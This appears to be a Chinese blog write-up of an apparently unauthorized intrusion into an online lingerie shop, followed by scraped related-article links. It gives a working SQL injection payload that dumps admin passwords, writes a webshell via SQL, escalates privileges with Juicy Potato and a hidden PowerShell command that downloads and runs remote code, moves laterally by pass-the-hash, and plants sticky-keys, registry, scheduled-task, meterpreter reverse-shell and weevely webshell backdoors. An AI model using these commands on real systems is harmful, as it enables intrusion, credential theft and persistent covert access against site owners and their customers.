mysql开源内库_记一次内衣渗透测试
文章很水,被学校强迫去上syb创业指导课,同桌上课难耐,人多又不敢去p站看考研视频,只能逛逛这些nei衣店缓冲一下,于是就有了下文
0x01 SQL注入
这站真大,不对,这站真圆.php的站随便随便一测
一枚注入
因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#
舒服了,这下可以给光明正大的进去选内衣了
0x02 拿shell
看看robots.txt
inurl:a.com admin
进入后台发现是ECSHOP 这里原本是file改为image绕过
似乎不行被重置了
这里发现可以执行sql语句而且存在绝对路径泄露
ok下面就好说了,写入一句话
0x03 提权
权限有点小低
存在mysql也没其他可以利用的
尝试mysql提权
除了目录不能上传其他条件都满足所以当我没说,上cs,powershell上线
提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接
然后我们在以system权限执行powershell
shell style.exe-p"powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('powershell地址'))\""-c{e60687f7-01a1-40aa-86ac-db1cbf673334}
这里面的双引号记得转义
0x04 横向渗透
为工作组环境,扫出来0.9也是一台web这里hash传递直接拿下,继续抓hash,目前以有如下账户 wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin WDAGUtilityAccount
平平无奇hash传递--
一个应该是web的的一个demo,然后0.7可能是数据库服务器
都是admin权限了如果想要获取system的话可以使用SelectMyParent,其实也就是j把新进程当中system进程的子进程,这里就用cs的马,先查看winlogon.exe的pid
可以看到这里为500
然后把我们的systen.exe上传,执行shell SelectMyParent.exe systen.exe 500
这步操作其实就是凑点字数 ,哈哈哈哈
0x05 权限维持
这里就拿本机测试了
粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示
使用如下命令
cd windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe
如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:
然后修改为完全控制
现在我们连续按下5次shift就弹出一个system权限的cmd
注册表注入后门 在普通用户权限下,攻击者将会需要执行的后门程序或者脚本路径写到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键值可以任意设置,或者直接执行如下命令添加启动项 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe" 当管理员重新登录系统时,就会执行后门程序
计划任务后门
命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1
以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks
meterpreter后门
meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A自动启动一个匹配的exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。-S 作为服务自动启动该木马(具有SYSTEM权限)-T 要使用的备用可执行模板-U 用户登录时自动启动该木马-X 系统引导时自动启动该木马-h 这个帮助菜单-i 每次连接尝试之间的时间间隔(秒)-p 运行Metasploit的系统正在侦听的端口-r 运行Metasploit监听连接的系统的IP
缺点是容易被杀毒软件查杀,然后它就在目标机新建一个vbs文件,然后每次自动启动他
web后门的话可以使用weevely 这里生成一个shell.php来测试
将文件放入服务器目录下,然后执行
weevely http://192.168.220.1/shell.php
shell 可以help查看帮助
audit.etcpasswd | 枚举/etc/passwdaudit.userfiles | 列举用户/home下具有权限的文件audit.mapwebfiles | 枚举任意Web站点的URL链接shell.php | 编写php文件shell.sh | 编写系统脚本system.info | 收集系统信息find.suidsgid | 查找SUID / SGID文件和目录find.perms | 查找权限可读/写/可执行文件和目录backdoor.tcp | TCP端口后门backdoor.reversetcp | 反弹TCP连接bruteforce.sql | 爆破指定数据库用户名密码bruteforce.sqlusers | 爆破所有数据库用户密码file.upload | 上传本地文件file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL file.enum | 在本地词表的书面枚举远程文件file.read | 读文件file.rm | 删除文件file.check | 检查远程文件的状态(md5值,大小,权限等)file.download | 下载远程二进制/ ASCII文件到本地sql.console | 启动SQL控制台sql.dump | 备份数据库,即脱库net.scan | 端口扫描net.phpproxy | 安装远程php代理net.ifaces | 显示远程主机网络接口信息net.proxy | 安装隧道通信代理
执行一些windows命令
执行自带命令
原创投稿作者:一寸一叶
mysql开源内库_记一次内衣渗透测试相关推荐
- mysql开源内库_将内裤穿在外面的男人(mysql)
superman 的好处是可以为所欲为,不仅可以修改自己的密码,还能给别人授权,修改别人的密码. 1.修改自己 的密码 首先要先登录mysql, 然后: mysqladmin -u root ...
- mysql开源内库_MySQL数据库(查询语句)
用户 角色 权限 select * from students1:查询这个表里的数据 select ssex from students1:在这个表里面查询ssex(性别) select dist ...
- 开源javascript库_如何自动化您的开源JavaScript项目最重复的任务
开源javascript库 by Sarah Dayan 通过莎拉·达扬 如何自动化您的开源JavaScript项目最重复的任务 (How to automate your open source J ...
- 开源css库_使用CSS和其他开源工具创建标志
开源css库 "创建和发展有关所有类型,其形式和功能的旗帜的知识体系,以及基于该知识的科学理论和原理." -根据国际皮肤病学联合会的定义,对皮肤病学进行定义. 有些国旗是国家的象征 ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- 记一次初级渗透测试模拟过程
0x00 前言 网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐.参赛者在竞技过程中能够更大的限度的收获专业知识.激发潜能.为了让更多人切身体会 ...
- 渗透分支写脚本_给小白的黑盒渗透测试作业——漏洞分析测试到安全加固建议...
概述 2016.12.22收到关于海洋网站及内网的的渗透测试项目,并对海洋CMS进行黑盒渗透测试.本次渗透测试对存在的漏洞进行了仔细的分析和测试,以了解该站点和对应的内网的安全程度,同时给出相应的安全 ...
- mysql connection是什么_记一次MySQL出现too many connection
今天中午的时候突然接到报警,MySQL连接数暴增..本来设置的max_conntion=6000, 这个数值连接已经够用.接到报警速度连接服务器连接mysql总是报如下错误: [mysql@local ...
- mysql 二十条记录_记 MySQL优化 20条
大多数的MySQL服务器都开启了查询缓存.这是提高性最有效的方法之一,而且这是被MySQL的数据库引擎处理的.当有很多相同的查询被执行了多次的时候,这些查询结果会被放到一个缓存中,这样,后续的相同的查 ...
最新文章
- SAP MM IV中的Duplicated Invoice Check功能的测试
- 关于SQL 数据库表中的聚集索引和非聚集索引等
- 什么是xmlschema
- Java虚拟机7:内存分配原则
- java.lang.IllegalStateException: Failed to read Class-Path attribute from manifest of jar file:/XXX
- ALGO-22 数的划分(DFS,经典剪枝)
- go实现区块链[3]-遍历区块链与数据库持久化
- java字符串拼接_这样写Java,同事直呼666
- 自制jQuery 复选框全选与反选插件
- C/C++的memset函数的说明和使用
- RDKit|使用MolDraw2DCairo模块绘制分子
- python k线斜率计算公式_通达信公式K线斜率+选股指标源码
- linux系统中哪个能代表中国时区,linux系统修改系统时间与时区的方法有哪些
- 微分几何笔记(9) —— 切丛,余切丛
- 浙江大学软件学院网络自动认证+Padavan路由器挂python脚本
- 移动端UI界面设计之-注册登录
- java 花卉管理系统_基于jsp的花卉交易-JavaEE实现花卉交易 - java项目源码
- salt内置执行模块列表
- Jlink或者stlink用于SWD接口下载程序
- bat批量修改文件名
热门文章
- 尼康d850相机参数测试软件,尼康(Nikon)D850 单机数码相机ISO感光度评测-ZOL中关村在线...
- LED灯光偏色的原因
- w ndows7怎么设置桌面保护,Windows7屏幕保护功能失效了怎么办?
- 【HJ42 学英语】C++
- java 数据库工资管理系统设计_数据库课程设计—企业工资管理系统(java版完整代码)...
- oracle 根据已有表创建新表
- ei检索计算机科学与应用,国内EI检索的期刊有哪些?(计算机、信息方向) - 论文投稿 - 小木虫 - 学术 科研 互动社区...
- 闲人闲谈PS之三十一——新收入准则中的合同损失计提
- 中国微型无刷直流电动机市场趋势报告、技术动态创新及市场预测
- FPGA和CPLD对比